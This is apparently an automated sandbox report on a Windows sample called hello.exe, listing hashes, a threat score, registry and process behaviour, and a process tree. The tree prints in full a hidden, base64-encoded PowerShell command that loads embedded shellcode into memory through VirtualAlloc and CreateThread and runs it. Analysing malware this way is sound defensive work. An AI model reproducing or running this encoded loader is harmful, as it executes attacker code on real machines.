3a80c99bb8fa69f219204912dbd54751fcef4100418731e897bf3a813bc833f8

Resubmissions

30/04/2024, 04:14

240430-etndgabh97 8

30/04/2024, 04:09

240430-eq4laabh49 3

Analysis

max time kernel
1049s
max time network
973s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
30/04/2024, 04:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hello.exe
Size

19KB
MD5

efe0d8e9ace006818f0cff13690c0d78
SHA1

f1020d62000df19d9c60af39cf8457b0ef35f69b
SHA256

3a80c99bb8fa69f219204912dbd54751fcef4100418731e897bf3a813bc833f8
SHA512

2466a98a0f0b8ae25f49d3f5649bd6151043d83fef0e8e35abc2e90977e48db8325aeea8fea3def2bad5f3b6be2fbc8f0d030fac198d8fc78d804c13bd57b1d6
SSDEEP

384:hEEoLO56ayzcMj+zdO/5qU9B3SDP/wgcYsINeWkoP73A:+E8O56lcVdwgc5INeO7w

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 19 IoCs

pid	Process
6816	hello.exe
6340	hello.exe
5096	hello.exe
4212	hello.exe
7720	hello.exe
6852	hello.exe
7420	hello.exe
1528	hello.exe
8804	hello.exe
2392	hello.exe
8828	hello.exe
9124	hello.exe
9004	hello.exe
5492	hello.exe
5408	hello.exe
6632	hello.exe
5768	hello.exe
8676	hello.exe
8636	hello.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4272278488\2581520266.pri	SecHealthUI.exe
File created	C:\Windows\rescache\_merged\4272278488\2581520266.pri	SecHealthUI.exe
File created	C:\Windows\rescache\_merged\4272278488\2581520266.pri	SecHealthUI.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133589240705517078"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
5320	chrome.exe
5320	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 58 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
8360	SecHealthUI.exe
6012	SecHealthUI.exe
8984	SecHealthUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 2988	4444	hello.exe	74
PID 4444 wrote to memory of 2988	4444	hello.exe	74
PID 220 wrote to memory of 3628	220	chrome.exe	77
PID 220 wrote to memory of 3628	220	chrome.exe	77
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 1396	220	chrome.exe	79
PID 220 wrote to memory of 2620	220	chrome.exe	80
PID 220 wrote to memory of 2620	220	chrome.exe	80
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81
PID 220 wrote to memory of 5112	220	chrome.exe	81

C:\Users\Admin\AppData\Local\Temp\hello.exe
"C:\Users\Admin\AppData\Local\Temp\hello.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:2988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff0e6e9758,0x7fff0e6e9768,0x7fff0e6e9778
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1876,i,50518145696848971,13007847548316994304,131072 /prefetch:2
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
